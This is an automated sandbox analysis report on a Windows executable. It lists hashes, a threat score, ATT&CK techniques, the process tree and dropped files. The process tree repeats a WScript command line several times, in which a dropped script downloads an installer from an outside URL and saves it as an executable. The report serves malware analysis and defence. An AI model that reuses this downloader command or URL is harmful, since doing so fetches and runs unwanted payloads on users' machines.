90c1a293e0e53e0bce3757aa6f0be2be93643c35566930788b2d091582f6ab62

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 18:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe
Size

184KB
MD5

6bd853382d3348142617153794ac6aa3
SHA1

69459c8eb0b31858b738a8223872c2eeafb01e77
SHA256

90c1a293e0e53e0bce3757aa6f0be2be93643c35566930788b2d091582f6ab62
SHA512

ccaf2316595c470e2ce99b9d24c2cecf7a69bc11560d46e9639fe3e8e8bc850557ae74f7767baf3c13c3b3a5bbf97f7b4ff58c970df16432dc90481295b6e62b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3K:/7BSH8zUB+nGESaaRvoB7FJNndnP

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	3060	WScript.exe
8	3060	WScript.exe
10	3060	WScript.exe
12	2468	WScript.exe
13	2468	WScript.exe
15	2968	WScript.exe
16	2968	WScript.exe
18	2568	WScript.exe
19	2568	WScript.exe
22	1260	WScript.exe
23	1260	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe

description	pid	process	target process
PID 1812 wrote to memory of 3060	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 3060	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 3060	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 3060	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2468	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2468	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2468	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2468	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2968	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2968	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2968	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2968	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2568	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2568	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2568	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 2568	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 1260	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 1260	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 1260	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe
PID 1812 wrote to memory of 1260	1812	6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\6bd853382d3348142617153794ac6aa3_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf29BF.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf29BF.exe
2⤵
- Blocklisted process makes network request
PID:3060

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf29BF.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf29BF.exe
2⤵
- Blocklisted process makes network request
PID:2468

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf29BF.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf29BF.exe
2⤵
- Blocklisted process makes network request
PID:2968

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf29BF.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf29BF.exe
2⤵
- Blocklisted process makes network request
PID:2568

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf29BF.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf29BF.exe
2⤵
- Blocklisted process makes network request
PID:1260

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
6e66bd2d283b36991f7460262e5ff4ae

SHA1
eb6906c6d9350ef0b8ff2edd81c3e51649b4a916

SHA256
564b4fa6970bf22294bceca2fb8f53087f3f5dec9565872d731cedd80aa9e7c3

SHA512
974fef50144e97b5bbae326f07ec863082693396e85dd42a0f85c86b6a3d0928b2da485cb7b3e541942d3c9bf49ce2f8063acf0ced79d6ed755928fdba453727

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
3b60fb814102d70e67e0ed45450d868b

SHA1
66f6595746174936f18cd6b20abf747a63e64029

SHA256
523cb2c74376fa52878b51d6944ab9a1654587a2280821751d6626a16f78c3ab

SHA512
2d750565ac466ecb300be71c55848399cf68b440fac331976d86f307433b1396c4ff1144a0037a1d522a2630ee2022438bfb981830dedbaa4df2d3fd429db4b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
fa6c52be95aaf0524a8686533b5f9477

SHA1
986337be6642c87b63d1450424242218db19e160

SHA256
7e97508565c56ec7b32539c6e653692bcfbe9a8d43b9c7a652722fbed0350df0

SHA512
11ddf9925ae8675845510280cbba4c81ac27165aa2a5ccfcd473bbe2ff3868eb798e2e7e66a3611ba27820e4e791896a4e33d90a59e02a64820f54995314b24a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
9b16d773ce5fb557cbee9b74cb44e532

SHA1
288f9ae6a982a2df458b00524898a0d0c614f44b

SHA256
ef205e9ec591bfbc7526944e5f4f33dc165d3073345c705dc0ba48336a8d2ee9

SHA512
e55e11be001c62321cf4d4952f54b766b06536c62989189fe7cc73c7ba4f9b7a3a0319500093bfa5d2f7f37a1e55db05cbdafb6dc590728ee505b28a28c20a1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize
6KB

MD5
a4e993454e22f13860f81fb379248c4f

SHA1
fe09c36c6fe1d2dcd0e9af5acf557375f75beb0d

SHA256
84e3927d2d72ae2b3144405a7ff9a1d13f2d0744afd1e8ab35b6e0fe8a84bccd

SHA512
2ca3de693d1f90dd442edb5b5a52356f20443b1cd1c4dc7ba954ab9cdc15ff4400d707c024f7d29150f67075cdc7a0f62c7203fd918463b36c42cbc369a3b9d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize
6KB

MD5
16d960a3a0d6b4bf71782401d76ec2a7

SHA1
d9e038950dc2fd561964ad47636a9cd8c76f31e2

SHA256
8dcbe0cd3ab1173f62d5fe15d813f599e07904b77c12eded532ada40e462fb74

SHA512
56930338a54cefe20637af3789e6493c941b7e4a14ebd198a8160932377b0884f1389b9948d9eecfdc0ae3c5de2a85f5361963e13bc37cc5cae56e6e45669979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize
6KB

MD5
4578e09dd0cf1417936578a4ebbf58dd

SHA1
424fefa39c7dcd2138c8f4163b295704f2346cf4

SHA256
8b47ea9c0c85c646c1a8025e20661021b9b2a3ca10a0d1e576e25df5421b1f56

SHA512
f88ce03836667bb285ee551acbaaab0eeccd23ad355eb0dcf783e5454d31e6af09258bc4c7aa5170c9b9c4fedcfeaea355c819e76817ee1be527fa924efd35b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize
6KB

MD5
a27e4678ae309d6f356a4d4e3da220d6

SHA1
ebff8e66c171debc0123ceb1f793c29d56b67371

SHA256
208c2a22f0938a4936f9e7655b45a8fb2943e7dc307f6d3250efdf771272df65

SHA512
44cfbfd3975e933c124656b278127e250e98addec0a79d41ddd4622edc83cfc9d58638b1af1263ff0efec11ab8d1178ee4e7cc700c9036a34067b03be88a19a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize
6KB

MD5
d21b1da6e736adb42ad7aba737bf27e6

SHA1
4ef0f9ef63829b9f62d134574b4648f716358e82

SHA256
566b26aa5f9b31f1b72d71d34ca9c817a6f6065ce19281cd948f388774c4691a

SHA512
64fae71e83aee3b230d160e3d45fa5a9a488ed9e54d24aefcf70f53526379517b7a15708955cc9c8f19ca3c70833e59241a059091fe6573ce60963b10bb58142

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5976.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar71F6.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf29BF.js
Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HHQOX1M9.txt
Filesize
177B

MD5
9b07dd4b19207fd0dde2f227d11d7f78

SHA1
d69170919d5efe9aa2e4796f7ec3ed34ed2ce77c

SHA256
5a5d197d3301e615f713a2c39bbe60cfc072d6335b4f49eb450a795ff2988f5e

SHA512
a38a04ddff25ae458cd4b25a19188dc21206c287b11b456ff3a840cd46d914efdb7de53f08a7971187ed3c3229801d32655a786f43283a687aa3470856702edf

Download Submit